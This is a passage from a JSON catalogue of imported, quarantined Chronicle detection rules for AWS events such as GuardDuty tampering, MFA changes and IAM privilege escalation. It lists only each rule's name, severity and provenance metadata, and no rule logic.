"author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-denial-of-service-activity-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_denial_of_service_activity_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/guardduty/aws_guardduty_denial_of_service_activity_detected.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-dga-domain-activity-detected", "type": "detection", "name": "aws_guardduty_dga_domain_activity_detected", "description": "aws_guardduty_dga_domain_activity_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-dga-domain-activity-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_dga_domain_activity_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/guardduty/aws_guardduty_dga_domain_activity_detected.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-disabled", "type": "detection", "name": "aws_guardduty_disabled", "description": "aws_guardduty_disabled", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_disabled", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_guardduty_disabled.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-malicious-or-suspicious-file-executed", "type": "detection", "name": "aws_guardduty_malicious_or_suspicious_file_executed", "description": "aws_guardduty_malicious_or_suspicious_file_executed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-malicious-or-suspicious-file-executed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_malicious_or_suspicious_file_executed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/guardduty/aws_guardduty_malicious_or_suspicious_file_executed.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-penetration-testing-activity-detected", "type": "detection", "name": "aws_guardduty_penetration_testing_activity_detected", "description": "aws_guardduty_penetration_testing_activity_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-penetration-testing-activity-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_penetration_testing_activity_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/guardduty/aws_guardduty_penetration_testing_activity_detected.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-publishing-destination-deleted", "type": "detection", "name": "aws_guardduty_publishing_destination_deleted", "description": "aws_guardduty_publishing_destination_deleted", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-publishing-destination-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_publishing_destination_deleted", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_guardduty_publishing_destination_deleted.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-tor-network-activity-detected", "type": "detection", "name": "aws_guardduty_tor_network_activity_detected", "description": "aws_guardduty_tor_network_activity_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-tor-network-activity-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_tor_network_activity_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/guardduty/aws_guardduty_tor_network_activity_detected.yaral" } }, { "id": "chronicle-detection-rules-aws-guardduty-trusted-or-threat-ip-lists-tampered", "type": "detection", "name": "aws_guardduty_trusted_or_threat_ip_lists_tampered", "description": "aws_guardduty_trusted_or_threat_ip_lists_tampered", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-guardduty-trusted-or-threat-ip-lists-tampered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_guardduty_trusted_or_threat_ip_lists_tampered", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_guardduty_trusted_or_threat_ip_lists_tampered.yaral" } }, { "id": "chronicle-detection-rules-aws-high-number-of-unknown-user-authentication-attempts", "type": "detection", "name": "aws_high_number_of_unknown_user_authentication_attempts", "description": "aws_high_number_of_unknown_user_authentication_attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-high-number-of-unknown-user-authentication-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_high_number_of_unknown_user_authentication_attempts", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_high_number_of_unknown_user_authentication_attempts.yaral" } }, { "id": "chronicle-detection-rules-aws-iam-access-analyzer-deleted", "type": "detection", "name": "aws_iam_access_analyzer_deleted", "description": "aws_iam_access_analyzer_deleted", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-iam-access-analyzer-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_iam_access_analyzer_deleted", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_iam_access_analyzer_deleted.yaral" } }, { "id": "chronicle-detection-rules-aws-iam-access-denied-discovery-events", "type": "detection", "name": "aws_iam_access_denied_discovery_events", "description": "aws_iam_access_denied_discovery_events", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-iam-access-denied-discovery-events.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_iam_access_denied_discovery_events", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_iam_access_denied_discovery_events.yaral" } }, { "id": "chronicle-detection-rules-aws-iam-activity-by-s3-browser-utility", "type": "detection", "name": "aws_iam_activity_by_s3_browser_utility", "description": "aws_iam_activity_by_s3_browser_utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-iam-activity-by-s3-browser-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_iam_activity_by_s3_browser_utility", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_iam_activity_by_s3_browser_utility.yaral" } }, { "id": "chronicle-detection-rules-aws-iam-activity-from-ec2-instance", "type": "detection", "name": "aws_iam_activity_from_ec2_instance", "description": "aws_iam_activity_from_ec2_instance", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-iam-activity-from-ec2-instance.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_iam_activity_from_ec2_instance", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_iam_activity_from_ec2_instance.yaral" } }, { "id": "chronicle-detection-rules-aws-iam-administrator-access-policy-attached", "type": "detection", "name": "aws_iam_administrator_access_policy_attached", "description": "aws_iam_administrator_access_policy_attached", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-iam-administrator-access-policy-attached.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_iam_administrator_access_policy_attached", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_iam_administrator_access_policy_attached.yaral" } }, { "id": "chronicle-detection-rules-aws-iam-compromised-key-quarantine-policy-attached", "type": "detection", "name": "aws_iam_compromised_key_quarantine_policy_attached", "description": "aws_iam_compromised_key_quarantine_policy_attached", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-iam-compromised-key-quarantine-policy-attached.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_iam_compromised_key_quarantine_policy_attached", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_iam_compromised_key_quarantine_policy_attached.yaral" } }, { "id": "chronicle-detection-rules-aws-kms-key-disabled-or-scheduled-for-deletion", "type": "detection", "name": "aws_kms_key_disabled_or_scheduled_for_deletion", "description": "aws_kms_key_disabled_or_scheduled_for_deletion", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-kms-key-disabled-or-scheduled-for-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_kms_key_disabled_or_scheduled_for_deletion", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_kms_key_disabled_or_scheduled_for_deletion.yaral" } }, { "id": "chronicle-detection-rules-aws-lambda-update-function-code", "type": "detection", "name": "aws_lambda_update_function_code", "description": "aws_lambda_update_function_code", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-lambda-update-function-code.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_lambda_update_function_code", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_lambda_update_function_code.yaral" } }, { "id": "chronicle-detection-rules-aws-lateral-movement-using-iam-session-token", "type": "detection", "name": "aws_lateral_movement_using_iam_session_token", "description": "aws_lateral_movement_using_iam_session_token", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-lateral-movement-using-iam-session-token.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_lateral_movement_using_iam_session_token", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_lateral_movement_using_iam_session_token.yaral" } }, { "id": "chronicle-detection-rules-aws-multi-factor-authentication-disabled", "type": "detection", "name": "aws_multi_factor_authentication_disabled", "description": "aws_multi_factor_authentication_disabled", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-multi-factor-authentication-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_multi_factor_authentication_disabled", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_multi_factor_authentication_disabled.yaral" } }, { "id": "chronicle-detection-rules-aws-new-mfa-method-registered-for-user", "type": "detection", "name": "aws_new_mfa_method_registered_for_user", "description": "aws_new_mfa_method_registered_for_user", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-new-mfa-method-registered-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_new_mfa_method_registered_for_user", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_new_mfa_method_registered_for_user.yaral" } }, { "id": "chronicle-detection-rules-aws-password-policy-change", "type": "detection", "name": "aws_password_policy_change", "description": "aws_password_policy_change", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-password-policy-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_password_policy_change", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_password_policy_change.yaral" } }, { "id": "chronicle-detection-rules-aws-privilege-escalation-using-iam-access-key", "type": "detection", "name": "aws_privilege_escalation_using_iam_access_key", "description": "aws_privilege_escalation_using_iam_access_key", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-privilege-escalation-using-iam-access-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_privilege_escalation_using_iam_access_key", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_privilege_escalation_using_iam_access_key.yaral" } }, { "id": "chronicle-detection-rules-aws-privilege-escalation-using-iam-login-profile", "type": "detection", "name": "aws_privilege_escalation_using_iam_login_profile", "description": "aws_privilege_escalation_using_iam_login_profile", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-privilege-escalation-using-iam-login-profile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_privilege_escalation_using_iam_login_profile", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_privilege_escalation_using_iam_login_profile.yaral" } }, { "id": "chronicle-detection-rules-aws-rds-snapshot-shared-publicly", "type": "detection", "name": "aws_rds_snapshot_shared_publicly", "description": "aws_rds_snapshot_shared_publicly", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-rds-snapshot-shared-publicly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_rds_snapshot_shared_publicly", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_rds_snapshot_shared_publicly.yaral" } }, { "id": "chronicle-detection-rules-aws-s3-made-public-by-acl", "type": "detection", "name": "aws_s3_made_public_by_acl", "description": "aws_s3_made_public_by_acl", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-s3-made-public-by-acl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_s3_made_public_by_acl", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_s3_made_public_by_acl.yaral" } }, { "id": "chronicle-detection-rules-aws-s3-public-access-block-removed", "type": "detection", "name": "aws_s3_public_access_block_removed", "description": "aws_s3_public_access_block_removed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-s3-public-access-block-removed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_s3_public_access_block_removed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_s3_public_access_block_removed.yaral" } }, { "id": "chronicle-detection-rules-aws-saml-identity-provider-changes", "type": "detection", "name": "aws_saml_identity_provider_changes", "description": "aws_saml_identity_provider_changes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-saml-identity-provider-changes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_saml_identity_provider_changes", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_saml_identity_provider_changes.yaral" } }, { "id": "chronicle-detection-rules-aws-security-group-open-to-world", "type": "detection", "name": "aws_security_group_open_to_world", "description": "aws_security_group_open_to_world", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-security-group-open-to-world.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_security_group_open_to_world", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_security_group_open_to_world.yaral" } }, { "id": "chronicle-detection-rules-aws-ses-service-modification", "type": "detection", "name": "aws_ses_service_modification", "description": "aws_ses_service_modification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-ses-service-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_ses_service_modification", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_ses_service_modification.yaral" } }, { "id": "chronicle-detection-rules-aws-successful-api-from-tor-exit-node", "type": "detection", "name": "aws_successful_api_from_tor_exit_node", "description": "aws_successful_api_from_tor_exit_node", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-successful-api-from-tor-exit-node.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_successful_api_from_tor_exit_node", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_successful_api_from_tor_exit_node.yaral" } }, { "id": "chronicle-detection-rules-aws-successful-console-authentication-from-multiple-ips", "type": "detection", "name": "aws_successful_console_authentication_from_multiple_ips", "description": "aws_successful_console_authentication_from_multiple_ips", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-successful-console-authentication-from-multiple-ips.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_successful_console_authentication_from_multiple_ips", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_successful_console_authentication_from_multiple_ips.yaral" } }, { "id": "chronicle-detection-rules-aws-successful-login-after-multiple-failed-attempts", "type": "detection", "name": "aws_successful_login_after_multiple_failed_attempts", "description": "aws_successful_login_after_multiple_failed_attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-successful-login-after-multiple-failed-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_successful_login_after_multiple_failed_attempts", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_successful_login_after_multiple_failed_attempts.yaral" } }, { "id": "chronicle-detection-rules-aws-unusual-number-of-failed-authentications-from-the-same-ip", "type": "detection", "name": "aws_unusual_number_of_failed_authentications_from_the_same_ip", "description": "aws_unusual_number_of_failed_authentications_from_the_same_ip", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-unusual-number-of-failed-authentications-from-the-same-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "aws_unusual_number_of_failed_authentications_from_the_same_ip", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/aws/cloudtrail/aws_unusual_number_of_failed_authentications_from_the_same_ip.yaral" } }, { "id": "chronicle-detection-rules-aws-user-creates-permanent-access-key", "type": "detection", "name": "aws_user_creates_permanent_access_key", "description": "aws_user_creates_permanent_access_key", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/aws-user-creates-permanent-access-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the 